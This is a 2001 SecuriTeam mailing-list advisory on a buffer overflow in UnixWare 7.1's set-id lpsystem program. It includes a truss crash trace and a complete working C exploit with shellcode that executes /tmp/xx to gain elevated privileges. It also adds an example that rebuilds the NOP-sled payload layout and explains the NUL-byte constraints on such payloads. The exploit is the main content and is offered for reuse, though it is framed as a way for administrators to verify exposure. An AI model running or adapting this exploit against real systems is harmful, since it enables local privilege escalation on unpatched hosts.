[EXPL] UnixWare 7 lpsystem Exploit Code Released
From: support@securiteam.com
To: list@securiteam.com
Subject: [EXPL] UnixWare 7 lpsystem Exploit Code Released
Message-Id: <20011014223618.42571138C1@mail.der-keiler.de>
Date: Mon, 15 Oct 2001 00:36:18 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
UnixWare 7 lpsystem Exploit Code Released
------------------------------------------------------------------------
SUMMARY
SCO UnixWare 7.1 installs '/usr/sbin/lpsystem' set-id (the listing below shows it owned by root, group lp). The program does not bound the length of its command-line argument: the truss trace below shows the whole 100000-byte argument being appended to /etc/lp/Systems and the process then dying with a SEGV_MAPERR on address 0x41414141, i.e. attacker-supplied data being used as a pointer. Any local user can therefore run code with the program's privileges; the advisory describes the outcome as root, while the exploit's own banner reports a uid of lp. The following exploit code can be used by administrators to verify whether they are vulnerable.
DETAILS
Exploit:
/**
** UnixWare 7.1 LPsystem Xploit BufferOverflow
**
** Alex Hernandez <al3xhernandez@ureach.com>
** Thanks all the people from Spain and Argentina.
**
** Special Greets to: White-B, Pablo S0r & Paco Spain.
**
**
** Technical Details:
**
** # ls -la /usr/sbin/lpsystem
** ---s--x--x 1 root lp 41840 Apr 4 1998 /usr/sbin/lpsystem
** #
** # /usr/sbin/lpsystem `perl -e '{print "A"x100000}'`
** Segmentation Fault - core dumped
** #
**
**
** Maped with truss :
**
** # truss /usr/sbin/lpsystem `perl -e '{print "A"x100000}'`
**
** [...]
**
** read(3, " A A A A A A A A A A A A".., 1032) = 1032
** write(4, " A A A A A A A A A A A A".., 1023) = 1023
** read(3, " A A A A A A A A A A A A".., 1032) = 1032
** write(4, " A A A A A A A A A A A A".., 1023) = 1023
** read(3, " A A A A A A A A A A A A".., 1032) = 475
** write(4, " A A A A A A A A A A A A".., 1023) = 1023
** read(3, 0x0830B740, 1032) = 0
** close(3) = 0
** write(4, " A A A A A A A A A A A A".., 549) = 549
** close(4) = 0
** rename("/etc/lp/lpdatAAA00012y", "/etc/lp/Systems") = 0
** lvlfile("/etc/lp/Systems", 2, 0x07F53C5C) Err#89 ENOSYS
** open("/etc/lp/Systems", O_WRONLY|O_APPEND, 0664) = 3
** fcntl(3, F_SETLK, 0x07F53C2C) = 0
** fcntl(3, F_GETFL, 0x00000009) = 9
** lseek64(3, 0, 2) = 1542283
** write(3, " A A A A A A A A A A A A".., 1000000) = 1000000
** write(3, " : x : - : s 5 : - : 1 0".., 20) = 20
** close(3) = 0
** lvlfile("/etc/lp/Systems", 2, 0x07F53C90) Err#89 ENOSYS
** xstat(2, "/var/spool/lp/fifos/FIFO", 0x07F53344) = 0
** open("/var/spool/lp/fifos/FIFO", O_WRONLY|O_NDELAY, 0) = 3
** close(3) = 0
** xstat(2, "/var/spool/lp/fifos/FIFO", 0x07F533E0) = 0
** open("/var/spool/lp/fifos/FIFO", O_RDWR, 0) = 3
** ioctl(3, I_CANPUT, 0x00000000) = 1
** getgid() = 103 [ 103 ]
** getuid() = 0 [ 0 ]
** Incurred fault #6, FLTBOUNDS %pc = 0x08072410
** siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
** Received signal #11, SIGSEGV [default]
** siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
** *** process killed ***
**
** Download the patch from SCO's page http://www.sco.com
** Bug reported 04-OCT-2001 and published on security
** pages 08-OCT-2001.
**
** Modify this code for your personal use :-)
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */
/* Shellcode for SCO UnixWare 7.1. It executes /tmp/xx, so that program must
   exist (and do something useful, e.g. spawn a shell) before the exploit is
   run. The string is passed through argv, so it must stay free of NUL bytes. */
char scoshell[]= //ShellCode Sco Unixware 7.1 /tmp/xx
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/xx\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
#define LEN 100000
#define NOP 0x90
/* Unused helper kept from the original: on i386 this leaves %esp in %eax,
   which gcc treats as the return value. */
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
int main(int argc, char *argv[]) {
long int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];
if(argc > 3) {
fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
exit(1);
}
else if (argc == 2){
offset=atoi(argv[1]);
}
else if (argc == 3) {
offset=atoi(argv[1]);
buflen=atoi(argv[2]);
}
else {
offset=100;
buflen=100000;
}
/* A caller-supplied length above LEN would overflow buf itself; a tiny one
   leaves no room for the shellcode. */
if (buflen < 64 || buflen > LEN) {
fprintf(stderr, "Error: buffer length must be between 64 and %d\n", LEN);
exit(1);
}
/* Guessed address inside the NOP sled; offset shifts it to cope with a
   slightly different stack layout on the target. */
addr=0x8056b10 + offset;
fprintf(stderr, "\nUnixWare 7.1 LPsystem exploit yields uid of lp\n");
fprintf(stderr, "Alex Hernandez al3xhernandez@ureach.com\n\n");
fprintf(stderr, "Using addr: 0x%lx\n", addr);
/* Payload layout: NOP sled | shellcode at the midpoint | return address
   repeated every 4 bytes up to the end, then a NUL terminator so that
   execl() hands the target a proper C string. */
memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)
*(int *)&buf[i]=addr;
buf[buflen-1]='\0';
execl("/usr/sbin/lpsystem", "lpsystem", buf, NULL);
perror("execl");   /* only reached if the target could not be executed */
exit(1);
}
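The truss trace in the comment above shows where the exploit's payload ends up (the whole argument is copied by lpsystem) and the fault on address 0x41414141 shows the 'A' fill being used as a pointer. The C program below is an added example, not part of the advisory or of Alex Hernandez's exploit: it rebuilds the same argv payload layout (NOP sled, shellcode at the midpoint, return address repeated with a 4-byte stride) and adds the check an execl()-delivered payload needs, namely that no NUL byte sits before the end of the string, since the kernel copies argv as C strings and the first NUL silently truncates everything after it. The shellcode in it is a constructed stand-in (NOPs and an int3), not working code, and 0x08056b10 is the address the exploit above guesses; the second address in main() is constructed to contain a zero byte to show the truncation case.

```c
/* Added example, not part of the advisory or the exploit above: argv payload
 * layout with the NUL-byte check an execl()-delivered overflow must pass. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90

/* Lay out sled | shellcode | return-address run in buf[0..len-1] and
 * NUL-terminate at buf[len-1]. Returns the number of 4-byte return-address
 * slots written, or -1 if the pieces do not fit. */
int build_payload(unsigned char *buf, size_t len, uint32_t ret,
                  const unsigned char *sc, size_t sclen)
{
    size_t sc_off, i;
    int slots = 0;

    if (len < 16 || sclen + 8 > len / 2)
        return -1;
    memset(buf, NOP, len);
    sc_off = len / 2;
    memcpy(buf + sc_off, sc, sclen);
    /* Little-endian store, as on the i386 target. Repeating the address means
     * any saved-pointer slot inside the run reads back as `ret`, provided the
     * slot's alignment matches the 4-byte stride started here. */
    for (i = sc_off + sclen; i + 4 <= len - 1; i += 4) {
        buf[i]     = (unsigned char)(ret & 0xff);
        buf[i + 1] = (unsigned char)((ret >> 8) & 0xff);
        buf[i + 2] = (unsigned char)((ret >> 16) & 0xff);
        buf[i + 3] = (unsigned char)((ret >> 24) & 0xff);
        slots++;
    }
    buf[len - 1] = '\0';
    return slots;
}

/* Offset of the first NUL before the terminator, or -1 if there is none.
 * Anything after that offset never reaches the target's argv. */
long first_embedded_nul(const unsigned char *buf, size_t len)
{
    size_t i;
    for (i = 0; i + 1 < len; i++)
        if (buf[i] == 0)
            return (long)i;
    return -1;
}

int main(void)
{
    static unsigned char buf[1000];
    /* constructed stand-in, not real shellcode */
    static const unsigned char stand_in[] = { 0x90, 0x90, 0xcc };
    /* first: the exploit's guess; second: constructed, low byte is 0x00 */
    uint32_t addrs[] = { 0x08056b10u, 0x08056b00u };
    size_t k;

    for (k = 0; k < 2; k++) {
        int slots = build_payload(buf, sizeof buf, addrs[k],
                                  stand_in, sizeof stand_in);
        long cut = first_embedded_nul(buf, sizeof buf);
        printf("ret=0x%08x slots=%d usable=%s", (unsigned)addrs[k], slots,
               cut < 0 ? "yes" : "no");
        if (cut >= 0)
            printf(" (payload truncated at byte %ld)", cut);
        putchar('\n');
    }
    return 0;
}
```

The NUL check is the reason the original exploit's return address works at all: every byte of 0x08056b10 is non-zero, and so are the NOP and every byte of the shellcode, so the full 100000-byte string survives execl(). Any candidate address with a zero byte would cut the payload at its first occurrence, right after the shellcode, leaving nothing to overwrite the saved pointer with.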
ADDITIONAL INFORMATION
The information has been provided by al3x hernandez <al3xhernandez@ureach.com>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.